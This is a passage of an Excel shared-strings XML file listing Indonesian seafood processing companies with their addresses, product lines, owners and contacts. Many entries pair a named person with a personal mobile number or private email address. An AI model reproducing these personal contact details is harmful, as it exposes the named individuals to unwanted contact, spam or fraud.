    <t>Kepiting Hidup, Lobster Hidup, Keong Hidup, Udang Ronggeng Hidup</t>
  </si>
  <si>
    <t>Jati Mulya</t>
  </si>
  <si>
    <t>wanqian1453@yahoo.com</t>
  </si>
  <si>
    <t>021-55912163</t>
  </si>
  <si>
    <t>08131059 5581</t>
  </si>
  <si>
    <t>WAYAN S</t>
  </si>
  <si>
    <t>PT. EKACITTA DIAN PERSADA</t>
  </si>
  <si>
    <t>Komplek Pergudangan Greenland Cluster Batavia Blok AG No.11 Kota Deltamas, Kel. Sukamahi, Kec. Cikarang Pusat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t xml:space="preserve">Kolagen Ikan </t>
  </si>
  <si>
    <t>Angela Trismitro</t>
  </si>
  <si>
    <t>Sukamahi</t>
  </si>
  <si>
    <t>edp.import@ekacitta.co.id</t>
  </si>
  <si>
    <t>021-5819361</t>
  </si>
  <si>
    <t>Firman Nursasongko 085288868641</t>
  </si>
  <si>
    <t>CV. SINAR LAUT ABADI TUBAN</t>
  </si>
  <si>
    <t>Jl. Raya Sugih Waras, Dusun Jabung, Kel. Sugihwaras, Kec. Jenu, Kabupaten Tuban</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Udang Beku, Teri Nasi Beku, Ikan Kering, Kerang Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>siwi muliati</t>
  </si>
  <si>
    <t>Sugihwaras</t>
  </si>
  <si>
    <t>n.didid@gmail.com</t>
  </si>
  <si>
    <t>sami asih +622232881784</t>
  </si>
  <si>
    <t>PT. INDU MANIS</t>
  </si>
  <si>
    <t>Kawasan Industri Gresik Kav G-1, Kel. Randuagung, Kec. Kebomas, Kabupaten Gresik</t>
  </si>
  <si>
    <t>Udang Rebus Beku, Udang Mentah Beku, Udang Berlapis Tepung Beku</t>
  </si>
  <si>
    <t>GUNAWAN</t>
  </si>
  <si>
    <t>farida.indumanis1@gmail.com</t>
  </si>
  <si>
    <t>031 - 3985321</t>
  </si>
  <si>
    <t>FARIDA NURSANTI - 081231633531</t>
  </si>
  <si>
    <t>Jl. Raya Lontar No. 216, Kel. Lontar, Kec. Sambikerep, Kota Surabaya</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Fillet Salmon Beku, Kerang Beku, Salmon Beku, Trout Beku, Udang Beku, Salmon Segar, Trout Segar, Ikan Demersal Beku, Fillet Patin Beku</t>
  </si>
  <si>
    <t>Sambikerep</t>
  </si>
  <si>
    <t>Lontar</t>
  </si>
  <si>
    <t>pt.saranaindogunalestari@gmail.com</t>
  </si>
  <si>
    <t>Beny Krisnawan / 08113550022</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT - MINI PLANT SANGKAN URIP</t>
  </si>
  <si>
    <t>Jl. Raya Cirebon - Losari KM 28,5, Kel. Malaka Sari, Kec. Gebang, Kabupaten Cirebon</t>
  </si>
  <si>
    <t>Gebang</t>
  </si>
  <si>
    <t>Malaka Sari</t>
  </si>
  <si>
    <t>Cirebon_rjg@kmlseafood.com</t>
  </si>
  <si>
    <t>Suhardi hamzah ( 087701055523) Syaiful 087774341222</t>
  </si>
  <si>
    <t>Khoirudin</t>
  </si>
  <si>
    <t>KSU ADI JAYA LESTARI</t>
  </si>
  <si>
    <t>Jl. Pembangunan No.5, Komplek PPI Sodohoa, Kel. Sanua, Kec. Kendari Barat, Kota Kendari</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Tuna Beku, Cephalopoda Beku, Kerang Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Herman hermansyah</t>
  </si>
  <si>
    <t>Kendari Barat</t>
  </si>
  <si>
    <t>Sodohoa</t>
  </si>
  <si>
    <t>koperasiajl@gmail.com</t>
  </si>
  <si>
    <t>Herman Hermansyah</t>
  </si>
  <si>
    <t>PT. MINA USAHA HARAPAN</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Tuna Loin Beku, Tuna Loin Segar, Ikan Pelagis Beku, Cephalopoda Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>Linda Erfianti</t>
  </si>
  <si>
    <t>minausahaharapan@gmail.com</t>
  </si>
  <si>
    <t>Linda Erfianti 08114315785</t>
  </si>
  <si>
    <t>PT. NESIA JAYA HUTAMA</t>
  </si>
  <si>
    <t>Jl. Raya Gumuk Rejo RT 02 RW 02, Kel. Gumukrejo, Kec. Pagelaran, Kabupaten Pringsewu</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>Susanto</t>
  </si>
  <si>
    <t>Gumukrejo</t>
  </si>
  <si>
    <t>nesiajayahutama@gmail.com</t>
  </si>
  <si>
    <t>Wulan 081381072361</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT - MINI PLANT KALIMAYA</t>
  </si>
  <si>
    <t>Desa Sukawali RT 01 RW 04, Kec. Pakuhaji, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>MUHAMMAD NADJIKH</t>
  </si>
  <si>
    <t>Pakuhaji</t>
  </si>
  <si>
    <t>Sukawali</t>
  </si>
  <si>
    <t>dimas.jaya@kmlseafood.com</t>
  </si>
  <si>
    <t>DIMAS JAYA SUBAKTI 087852579730</t>
  </si>
  <si>
    <t>AHMAD ZAINUDDIN</t>
  </si>
  <si>
    <t>PT. RUBELLI INDONESIA</t>
  </si>
  <si>
    <t>Taman Pergudangan dan Perkantoran Blok C8, Jl. Muara Baru Raya No. 30 Kp. Luar Batang, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Salmon Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>Taufit Hidayat</t>
  </si>
  <si>
    <t>ridwanfirmansyah996@gmail.com</t>
  </si>
  <si>
    <t>Ginan 08568315318</t>
  </si>
  <si>
    <t>PT. SINAR GRAHA</t>
  </si>
  <si>
    <t>Jl. Sultan Abdullah No.59, Kel. Tallo, Kec. Tallo Lama, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Demersal Beku, Kepiting Beku, Cephalopoda Beku, Udang Kipas Beku, Ikan Pelagis Beku, Cephalopoda Segar, Ikan Demersal Segar, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>LENNY SUGANDY</t>
  </si>
  <si>
    <t>Tallo Lama</t>
  </si>
  <si>
    <t>stanwasbppmhp@yahoo.co.id</t>
  </si>
  <si>
    <t>0411-439660</t>
  </si>
  <si>
    <t>JOHAN SUSANTO / 08164399202</t>
  </si>
  <si>
    <t>JOHAN SUSANTO</t>
  </si>
  <si>
    <t>PT. FLYING FISH ALGAE</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami No.19, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>LIN, ZONGQUN</t>
  </si>
  <si>
    <t>Parang Loe</t>
  </si>
  <si>
    <t>flyingfishalgae888@gmail.com</t>
  </si>
  <si>
    <t>MARDIANA 082349064872</t>
  </si>
  <si>
    <t>PT. MARITIM NUSANTARA PERKASA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Nizam Zachman Jl. Muara Baru Ujung Blok T No.8 RT 020 RW 017, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Bandeng Beku, Ikan Demersal Beku, Cephalopoda Beku, Ikan Pelagis Beku, Hiu Beku</t>
  </si>
  <si>
    <t>pt.mnperkasa2@gmail.com</t>
  </si>
  <si>
    <t>NOVALYAN STEGO (QC) 083808984084</t>
  </si>
  <si>
    <t>UD. UTAMA SENTOSA TIMIKA</t>
  </si>
  <si>
    <t>Jl. Yos Sudarso KM 7, Kel. Kamoro Jaya, Kec. Timika Timur, Kabupaten Mimika</t>
  </si>
  <si>
    <t>Udang Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Zaenatul Firdaus</t>
  </si>
  <si>
    <t>Timika Timur</t>
  </si>
  <si>
    <t>Kamoro Jaya</t>
  </si>
  <si>
    <t>firdaus.zaenatul2609@gmail.com</t>
  </si>
  <si>
    <t>Zaenatul Firdaus 081383106717</t>
  </si>
  <si>
    <t>Chairul Sani</t>
  </si>
  <si>
    <t>PT. TRIDAYA ERAMINA BAHARI</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok K No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Hiu Beku, Lobster Beku, Kepiting Lunak Beku, Bandeng Beku, Tuna Segar, Tuna Beku, Ikan Pelagis Beku, Ikan Air Tawar Beku</t>
  </si>
  <si>
    <t>DAYAT SUNTORO</t>
  </si>
  <si>
    <t>delima_saridewi@yahoo.com</t>
  </si>
  <si>
    <t>021-6631226</t>
  </si>
  <si>
    <t>Delima Sari Dewi 082167335665</t>
  </si>
  <si>
    <t>Kawasan Industri Karyadeka Pancamurni Kav. B3, Kel. Pasirsari, Kec. Cikarang Selatan, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Bola Tuna Artery Beku, Tepung Ikan, Ikan Pelagis Beku, Tuna Beku, Tuna Loin Masak Beku, Minyak Ikan, Tuna Pouch</t>
  </si>
  <si>
    <t>Herry Yanto</t>
  </si>
  <si>
    <t>Pasirsari</t>
  </si>
  <si>
    <t>qa.dc@pbn.co.id</t>
  </si>
  <si>
    <t>021-89906707</t>
  </si>
  <si>
    <t>ENDANG ROSIANA, 081281201030</t>
  </si>
  <si>
    <t>Ferly Kurnia Santoso</t>
  </si>
  <si>
    <t>Jl. Tambak Aji V No.9, Kel. Tambak Aji, Kec. Ngaliyan, Kota Semarang</t>
  </si>
  <si>
    <t>Fillet Nila Segar, Fillet Nila Beku, Nila Loin Beku, Nila Utuh Beku, Kulit Nila Beku</t>
  </si>
  <si>
    <t>PETER ZUELLIG</t>
  </si>
  <si>
    <t>Tambak Aji</t>
  </si>
  <si>
    <t>mahmud.mudayani@regalsprings.com</t>
  </si>
  <si>
    <t>024 -8663000</t>
  </si>
  <si>
    <t xml:space="preserve">MAHMUD MUDAYANI / +62813 3466 4792 </t>
  </si>
  <si>
    <t>PT. KAWA GUTI</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami (Tol Lama) No.22, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>HASNI</t>
  </si>
  <si>
    <t>haerulkawaguti22@gmail.com</t>
  </si>
  <si>
    <t>0411-512615</t>
  </si>
  <si>
    <t>Haeruddin &amp; 085255805736</t>
  </si>
  <si>
    <t>PT. CAKRAWALA SEAFOOD JAYA</t>
  </si>
  <si>
    <t>Jl. Pejuang 45, Dusun Hargosari I, Kel. Merbau Mataram, Kec. Merbau Mataram, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Kepiting Beku, Rajungan Beku, Cephalopoda Beku, Udang Beku</t>
  </si>
  <si>
    <t>Dedy Juli Kurniadi, Tri Sukadi, Eko Kusuma Wijaya</t>
  </si>
  <si>
    <t>Merbau Mataram</t>
  </si>
  <si>
    <t>csjaya.id@gmail.com</t>
  </si>
  <si>
    <t>+62 721 241535</t>
  </si>
  <si>
    <t>Eko Kusuma Wijaya +62 812 7206 955</t>
  </si>
  <si>
    <t>Eko Kusuma Wijaya</t>
  </si>
  <si>
    <t>PT. INDONESIA MARICULTURE INDUSTRIES (KM. MITRA KARIMUN-3)</t>
  </si>
  <si>
    <t>Pulau Murai Batu, Kel. Keban, Kec. Moro, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Hidup</t>
  </si>
  <si>
    <t>ESTHER HARTATI SATYONO (CEO)</t>
  </si>
  <si>
    <t>Moro</t>
  </si>
  <si>
    <t>Keban</t>
  </si>
  <si>
    <t>alghomidhimuhidin@yahoo.co.id</t>
  </si>
  <si>
    <t>MUHIDDIN AL-GHOMIDHI 082174894561 / 085760376985</t>
  </si>
  <si>
    <t>EDI SUPRIADI</t>
  </si>
  <si>
    <t>Kapal Pengolah Ikan</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Perum Prasarana Perikanan Samudera Blok K-5, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Beku, Paha Kodok Beku, Produk Perikanan Bernilai Tambah Beku, Cephalopoda Bernilai Tambah Beku, Udang Bernilai Tambah Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Telur Ikan Terbang Beku</t>
  </si>
  <si>
    <t>qcredribbon@yahoo.co.id</t>
  </si>
  <si>
    <t>021 66695639</t>
  </si>
  <si>
    <t>Pungky, 081284672663</t>
  </si>
  <si>
    <t>DARMADI MARPAULI</t>
  </si>
  <si>
    <t>PT. EXPRAVET NASUBA</t>
  </si>
  <si>
    <t>Jl. K. L. Yos Sudarso KM 8,8 No.88, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Fillet Patin Beku, Steak Ikan Beku, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Rachman</t>
  </si>
  <si>
    <t>qmsnasuba@gmail.com</t>
  </si>
  <si>
    <t>061-6851258</t>
  </si>
  <si>
    <t>Hasman 082165059608</t>
  </si>
  <si>
    <t>Sumadi Rachman</t>
  </si>
  <si>
    <t>PT. LAUTAN SAKTI JAYA</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri X/1, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya</t>
  </si>
  <si>
    <t>Udang Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku</t>
  </si>
  <si>
    <t>LIU ZENGQUAN</t>
  </si>
  <si>
    <t>lautansaktijaya.legal@gmail.com</t>
  </si>
  <si>
    <t>YAYAN SETYAWAN 081330274778</t>
  </si>
  <si>
    <t>ALIM HUDIONO</t>
  </si>
  <si>
    <t>PT. CENTRAM</t>
  </si>
  <si>
    <t>Desa Carat, Kec. Gempol, Kabupaten Pasuruan</t>
  </si>
  <si>
    <t>Tepung Carrageenan</t>
  </si>
  <si>
    <t>Yanto Soedjatmiko</t>
  </si>
  <si>
    <t>Carat</t>
  </si>
  <si>
    <t>hrd.centram@gmail.com</t>
  </si>
  <si>
    <t>0343-851441</t>
  </si>
  <si>
    <t>Rulianah 081703923070</t>
  </si>
  <si>
    <t>CV. ANUGERAH BAHARI MANDIRI</t>
  </si>
  <si>
    <t>Jl. Kapasa Raya No.38A, Kel. Kapasa, Kec. Tamalanrea, Kota Makassar</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Bandeng Beku, Cephalopoda Beku, Tuna Beku, Cephalopoda Segar, Ikan Pelagis Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>LILY WISMAN</t>
  </si>
  <si>
    <t>yusri74.yus@gmail.com</t>
  </si>
  <si>
    <t>0411-512455</t>
  </si>
  <si>
    <t>Yusri Alamsyah 081342587516</t>
  </si>
  <si>
    <t>YUSRI ALAMSYAH</t>
  </si>
  <si>
    <t>CABANG LAMPUNG BUMI MENARA INTERNUSA, PT.</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami KM 12, Kel. Lematang, Kec. Tanjung Bintang, Kabupaten Lampung Selatan</t>
  </si>
  <si>
    <t xml:space="preserve">Salmon Beku, Udang Mentah Beku, Udang Rebus Beku, Ikan Demersal Beku, Daging Rajungan Pasteurisasi </t>
  </si>
  <si>
    <t>INDRA WINOTO</t>
  </si>
  <si>
    <t>Lematang</t>
  </si>
  <si>
    <t>dc.adm@lampung.ptbmi.com</t>
  </si>
  <si>
    <t>0721 350002</t>
  </si>
  <si>
    <t>TIYA / 0816-410001 / 0823-06023920</t>
  </si>
  <si>
    <t>HERMAN KUSTIAWAN</t>
  </si>
  <si>
    <t>CV. ANGIN TIMUR SEAFOODS</t>
  </si>
  <si>
    <t>Pergudangan Sinar Gedangan Blok E-15, Kel. Gemurung, Kec. Gedangan, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Fillet Hiu Beku</t>
  </si>
  <si>
    <t>Moch.Saleh,Ir</t>
  </si>
  <si>
    <t>Gemurung</t>
  </si>
  <si>
    <t>angintimur.sby19@gmail.com</t>
  </si>
  <si>
    <t>031-8012816</t>
  </si>
  <si>
    <t>Vera 082337327302</t>
  </si>
  <si>
    <t>CV. INDO PACIFIC</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jl. Tuna III No.3, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Gelembung Ikan Kering, Udang Kering, Teripang Kering, Salmon Beku, Tuna Beku, Hiu Beku, Kerang Beku, Cephalopoda Beku, Pari Beku, Udang Kipas Beku, Bandeng Beku, Rajungan Beku, Ikan Pelagis Segar, Tuna Segar, Kerang Segar, Ikan Demersal Segar, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>ANTONIUS KORIN AMTINI</t>
  </si>
  <si>
    <t>cv.indo_pacific@yahoo.com</t>
  </si>
  <si>
    <t>021-66605638</t>
  </si>
  <si>
    <t>ALVIAN DWI NUGRAHA 085257732608</t>
  </si>
  <si>
    <t>MAMAN SUHERMAN</t>
  </si>
  <si>
    <t>HIJRIAN FOOD</t>
  </si>
  <si>
    <t>Kp. Leuweunglarangan RT 003 RW 001, Desa Pancawati, Kec. Caringin, Kabupaten Bogor</t>
  </si>
  <si>
    <t>JAKRI AHMAD SUYATNA</t>
  </si>
  <si>
    <t>Caringin</t>
  </si>
  <si>
    <t>Pancawati</t>
  </si>
  <si>
    <t>hijrianfood@gmail.com</t>
  </si>
  <si>
    <t>JAKRI AHAMD SUYATNA 0857 6303 7477</t>
  </si>
  <si>
    <t>CV. DELTON</t>
  </si>
  <si>
    <t>Kp. Jongjing RT 010 RW 003, Kel. Laban, Kec. Tirtayasa, Kabupaten Serang</t>
  </si>
  <si>
    <t>AGUSSALIM</t>
  </si>
  <si>
    <t>Tirtayasa</t>
  </si>
  <si>
    <t>Laban</t>
  </si>
  <si>
    <t>uddelton@yahoo.com</t>
  </si>
  <si>
    <t>Agussalim 087875857878</t>
  </si>
  <si>
    <t>AGUSSALIM &amp; 081354889123</t>
  </si>
  <si>
    <t>JAJA MUJAHIDIN</t>
  </si>
  <si>
    <t>PT. ARUMIA KHARISMA INDONESIA</t>
  </si>
  <si>
    <t>Jl. Tongkol Komplek Kantor Pelabuhan Perikanan Donggala, Kel. Labuan Bajo, Kec. Banawa, Kabupaten Donggala</t>
  </si>
  <si>
    <t>Tuna Loin Segar, Tuna Segar</t>
  </si>
  <si>
    <t>Achmad Arifin</t>
  </si>
  <si>
    <t xml:space="preserve">Banawa </t>
  </si>
  <si>
    <t>Labuan Bajo</t>
  </si>
  <si>
    <t>info@arumia.co.jp</t>
  </si>
  <si>
    <t>0451-8442335</t>
  </si>
  <si>
    <t>Sumartono (081245151615)</t>
  </si>
  <si>
    <t>Stenly Panintjo</t>
  </si>
  <si>
    <t>PT. GABUNGAN SAMUDERA INTERNASIONAL</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.05 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Sirip Hiu Beku, Kerang Beku, Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Udang Beku, Hiu Beku, Kepiting Beku, Salmon Beku, Trout Beku</t>
  </si>
  <si>
    <t>qc1gsifisheries@gmail.com</t>
  </si>
  <si>
    <t>021-22663217</t>
  </si>
  <si>
    <t>Mutya Liananda 087883262547</t>
  </si>
  <si>
    <t>Mutya Liananda Kuspriyanto</t>
  </si>
  <si>
    <t>PT. HARAPAN AHIAN JAYA</t>
  </si>
  <si>
    <t>Jl. Udang Area Muara Baru Center Pelabuhan Perikanan Samudera Nizam Zachman Jakarta, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>An Siem</t>
  </si>
  <si>
    <t>pthaj.id@gmail.com</t>
  </si>
  <si>
    <t>An Siem 08118901868</t>
  </si>
  <si>
    <t>PT. KIU KIU FISHERY</t>
  </si>
  <si>
    <t>Jl. Tuna II Blok K 7 B Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Salmon Beku, Trout Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>KHO TJONG SUT</t>
  </si>
  <si>
    <t>fisherykiukiu@yahoo.com</t>
  </si>
  <si>
    <t>Subur 081515616566</t>
  </si>
  <si>
    <t>IMAM MUKHOLIL</t>
  </si>
  <si>
    <t>PT. INDO LAUTAN MAKMUR</t>
  </si>
  <si>
    <t>Jl. Raya Sawocangkring No.02 RT 01 RW 01, Kel. Sawocangkring, Kec. Wonoayu, Kabupaten Sidoarjo</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Beku, Cephalopoda Beku, Surimi Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>yao chia ming</t>
  </si>
  <si>
    <t>Sawocangkring</t>
  </si>
  <si>
    <t>pt_indolautanmakmur@yahoo.com</t>
  </si>
  <si>
    <t>031-8833968</t>
  </si>
  <si>
    <t>CAKRA LAKSANA 085748296072</t>
  </si>
  <si>
    <t>KARNOTO</t>
  </si>
  <si>
    <t>PT. MEDAN TROPICAL CANNING &amp; FROZEN INDUSTRIES</t>
  </si>
  <si>
    <t>Jl. K. L. Yos Sudarso KM 10.5 Kawasan Industri Medan, Kel. Mabar, Kec. Medan Deli, Kota Medan</t>
  </si>
  <si>
    <t>Kaleng, Beku, Segar, -</t>
  </si>
  <si>
    <t>Kerang Kaleng, Tuna Kaleng, Cephalopoda Kaleng, Tuna Loin Masak Beku, Udang Masak Kupas, Ikan Asin Kaleng, Seafood Kaleng, Cephalopoda Rebus Beku, Cephalopoda Beku, Kepiting Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Daging Bekicot Beku, Udang Beku, Sarden Kaleng, Makerel Kaleng, Udang Masak Beku, Ikan Hasil Budidaya Beku, Kerang Beku, Daging Bekicot Rebus Beku, Daging Rajungan Rebus Beku, Daging Rajungan Kaleng, Udang Kaleng</t>
  </si>
  <si>
    <t>HUSIN PRATAMA</t>
  </si>
  <si>
    <t>medancanning@gmail.com</t>
  </si>
  <si>
    <t>061 6850038</t>
  </si>
  <si>
    <t>Siswoyo 081369278100</t>
  </si>
  <si>
    <t>PT. NICHINDO MANADO SUISAN</t>
  </si>
  <si>
    <t>Jl. Trans Sulawesi Km 52 Lingkungan VII, Kel. Pondang, Kec. Amurang Timur, Kabupaten Minahasa Selatan</t>
  </si>
  <si>
    <t>WILLY LISTON MANTJORO</t>
  </si>
  <si>
    <t>Amurang Timur</t>
  </si>
  <si>
    <t>Pondang</t>
  </si>
  <si>
    <t>nichindo_manado@yahoo.com</t>
  </si>
  <si>
    <t>0430-21972, 0431-823114</t>
  </si>
  <si>
    <t>Yondris Adare 08229222733, Lenda Lembong 081356098459</t>
  </si>
  <si>
    <t>PT. CAHAYA BAHARI JAKARTA</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Muara Angke Jl. Pendaratan Ikan No.04 RT 005 RW 003, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Tuna Beku, Udang Beku, Hiu Beku, Sirip Hiu Beku, Salmon Beku, Trout Beku, Kepiting Beku, Kerang Beku, Salmon Segar, Trout Segar</t>
  </si>
  <si>
    <t>Then Herry Yulianto</t>
  </si>
  <si>
    <t>qc1cbjgroup@gmail.com</t>
  </si>
  <si>
    <t>Widi Astuti 088977748340</t>
  </si>
  <si>
    <t>Widi Astuti</t>
  </si>
  <si>
    <t>PT. BERKAT SAMUDERA SUKSES</t>
  </si>
  <si>
    <t>Pasar Botania 2 Kios Blok D No.07, Kel. Berlian, Kec. Batam Kota, Kota Batam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Segar, Udang Segar</t>
  </si>
  <si>
    <t>LEXSI MAUKAR</t>
  </si>
  <si>
    <t>Berlian</t>
  </si>
  <si>
    <t>pt.berkatsamuderasukses@gmail.com</t>
  </si>
  <si>
    <t>LEXSI MAUKAR 081270649988</t>
  </si>
  <si>
    <t>PT. SARANA YEOMAN SEMBADA</t>
  </si>
  <si>
    <t>Jl. Pattimura RT 002 RW 002 Teluk Nipah, Telaga Punggur, Kel. Kabil, Kec. Nongsa, Kota Batam</t>
  </si>
  <si>
    <t xml:space="preserve">SANG LONG AL SAMAD </t>
  </si>
  <si>
    <t xml:space="preserve">Nongsa </t>
  </si>
  <si>
    <t>Kabil</t>
  </si>
  <si>
    <t>sys_fishery@yahoo.com</t>
  </si>
  <si>
    <t>Muhammad Yunus 082285002533</t>
  </si>
  <si>
    <t>PT. CDF INDONESIA</t>
  </si>
  <si>
    <t>Desa Kauditan I Jaga IV, Kec. Kauditan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Asap, Reduksi</t>
  </si>
  <si>
    <t>Ikan Kayu, Tepung Ikan</t>
  </si>
  <si>
    <t>CHIA YU CHUNG</t>
  </si>
  <si>
    <t>Kauditan</t>
  </si>
  <si>
    <t>Kauditan Satu</t>
  </si>
  <si>
    <t>anggiaayu27@gmail.com</t>
  </si>
  <si>
    <t>(0438) 5554208</t>
  </si>
  <si>
    <t>Gusamwati / 082261804373</t>
  </si>
  <si>
    <t>PT. SURYA FRESHINDO INTIMAS</t>
  </si>
  <si>
    <t>Jl. Nusantara RT 002 RW 004, Kel. Tanjung Balai Kota, Kec. Karimun, Kabupaten Karimun</t>
  </si>
  <si>
    <t>Ikan Demesal Beku, Ikan Demersal Segar, Ikan Pelagis Segar, Udang Segar, Cephalopoda Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Tanjung Balai Kota</t>
  </si>
  <si>
    <t>suryafreshindointimas88@gmail.com</t>
  </si>
  <si>
    <t>Everlyn 082384456136</t>
  </si>
  <si>
    <t>UD. KAYA RASA</t>
  </si>
  <si>
    <t>Perum Keledang Mas Baru Blok BR/18, Kel. Sungai Keledang, Kec. Samarinda Seberang, Kota Samarinda</t>
  </si>
  <si>
    <t>Nugget Udang, Pempek Ikan</t>
  </si>
  <si>
    <t>ARINTIA DEWI, S.Pi</t>
  </si>
  <si>
    <t>Samarinda Seberang</t>
  </si>
  <si>
    <t>Sungai Keledang</t>
  </si>
  <si>
    <t>arintia.dewikr@gmail.com</t>
  </si>
  <si>
    <t>Arintia Dewi &amp; 085250496410</t>
  </si>
  <si>
    <t>ARINTIA DEWI, S. Pi</t>
  </si>
  <si>
    <t>PT. CAHAYA ANUGERAH SAMUDERA ABADI JAYA</t>
  </si>
  <si>
    <t>Jl. Dermaga Baru No.7, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Chandra Buana</t>
  </si>
  <si>
    <t>ptcasajaya@gmail.com</t>
  </si>
  <si>
    <t>MUH. SYAIFULLAH/081380848178</t>
  </si>
  <si>
    <t>PT. KENT HASIL LAUT</t>
  </si>
  <si>
    <t>Jl. Peternakan 2 Blok C9 No.24B RT 006 RW 007, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>kenthasil.laut@yahoo.com</t>
  </si>
  <si>
    <t>PT. SEKAR BUMI TBK</t>
  </si>
  <si>
    <t>Jl. Millennium Raya Blok L1 No.1 Kawasan Industri Millennium, Kel. Peusar, Kec. Panongan, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Udang Mentah Beku, Produk Perikanan Bernilai Tambah Beku, Cephalopoda Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>legal@skbfood.com</t>
  </si>
  <si>
    <t>021-51401122</t>
  </si>
  <si>
    <t>Verdy 082230011836</t>
  </si>
  <si>
    <t>PAHLAWAN HARI TJAHJONO</t>
  </si>
  <si>
    <t>Jl. Raya Rembang Sarang, Kel. Labuhan Kidul, Kec. Sluke, Kabupaten Rembang</t>
  </si>
  <si>
    <t>Beku, Kering, Lumatan Daging</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku, Udang Beku, Telur Ikan Terbang Kering, Telur Ikan Terbang Beku, Pasta Ikan Beku, Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Kerang Beku, Lobster Beku, Kepiting Beku, Rajungan Beku, Udang Kipas Beku</t>
  </si>
  <si>
    <t>Yao Chia Ming</t>
  </si>
  <si>
    <t>Labuhan Kidul</t>
  </si>
  <si>
    <t>ptindolautanmakmur_rembang86@yahoo.com</t>
  </si>
  <si>
    <t>Cakra laksana  (085748296072)</t>
  </si>
  <si>
    <t>PT. BANDAR BAHARI SUKSES</t>
  </si>
  <si>
    <t>Gudang Alat Perikanan Blok D No.3, Jl. Dermaga Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
